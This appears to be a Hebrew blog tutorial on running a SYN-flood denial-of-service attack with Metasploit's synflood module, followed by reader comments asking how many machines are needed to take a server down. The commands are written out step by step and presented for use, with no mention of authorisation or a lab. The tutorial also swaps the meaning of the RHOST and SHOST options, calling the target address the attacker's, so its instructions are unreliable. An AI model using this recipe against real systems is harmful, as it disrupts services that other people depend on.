Home אבטחת מידעPenetration Testing - Offense ביצוע התקפת DOS פשוטה מסוג SYN

ביצוע התקפת DOS פשוטה מסוג SYN

5 comments
נהנתם מהמאמר ? שתפו אותו!

ביצוע התקפת DOS פשוטה

מדריך זה הוא המשך למאמר התקפת מניעת שירות DOS ו DDOS וההבדל בניהם

הצפת SYN היא התקפה פשוטה מסוג DOS פירוש של Denial of service  ובעברית התקפת מניעת שירות,

אנו נשלח רצף חבילות של בקשת SYN כך המחשב יפתח חיבורים עד שלא יישאר לו חיבורים פתוחים

ההתקפה היא פשוטה כיוון שאינה כוללת “בוטים” ואופן פגיעתה היא מזערית אך אני רוצה שתבינו את הרעיון ואך זה נראה במציאות.

נפתח את ה Terminal ונרשום metasploit

לאחר מכן נרשום use auxiliary /dos/tcp/synflood

SYN

SYN

נגדיר את הIP התוקף

set RHOST 192.168.1.103

את היעד

set SHOST 10.0.0.50

SYN

SYN

נרשום run ונוכל לראות שהמתקפה פעילה

SYN

SYN

לחצו ctrl + c לביטול

 

מאמרים קשורים

5 comments

Ofek Sitbon -

היי, כשניסיתי לבצע את התקפת הDOS הTerminal לא זיהה לי את הפקודות. מדוע? האם צריך להוריד משהו מיוחד? כמובן משתמש בUbuntu

Reply
Tal Ben Shushan -

כמובן אין לך metasploit מותקן, על מנת לבצע את המדריכים באתר עדיף שתתקין הפצת Penetration

https://shushan.co.il/%D7%9E%D7%94%D7%9D-%D7%94%D7%A4%D7%A6%D7%95%D7%AA-penetration-testing-%D7%95%D7%9E%D7%94-%D7%94%D7%94%D7%91%D7%93%D7%9C%D7%99%D7%9D-%D7%91%D7%A0%D7%99%D7%94%D7%9D

Reply
Ofek Sitbon -

אוקיי, ולאחר ביצוע הפקודות, מה אני בעצם אמור לראות במחשב? מה אמור לקרות בעקבות הDOS?

Reply
Tal Ben Shushan -

כאשר אתה היחיד שמבצע התקפת DOS לא תיהיה כמעט השפעה או בכלל, אבל אם כמות גדולה של מחשבים מבצעת זו בו זמנית, זה יצור עומס על השרת עד כדי מצב שהוא אינו יכול להגיב והשירותים בו עלולים לקרוס…

Reply
גדול -

וכמה מחשבים תוקפים צריך בשביל שההתקפה תשפיע?
לכמה זמן היא מחזיקה?

Reply

Leave a Comment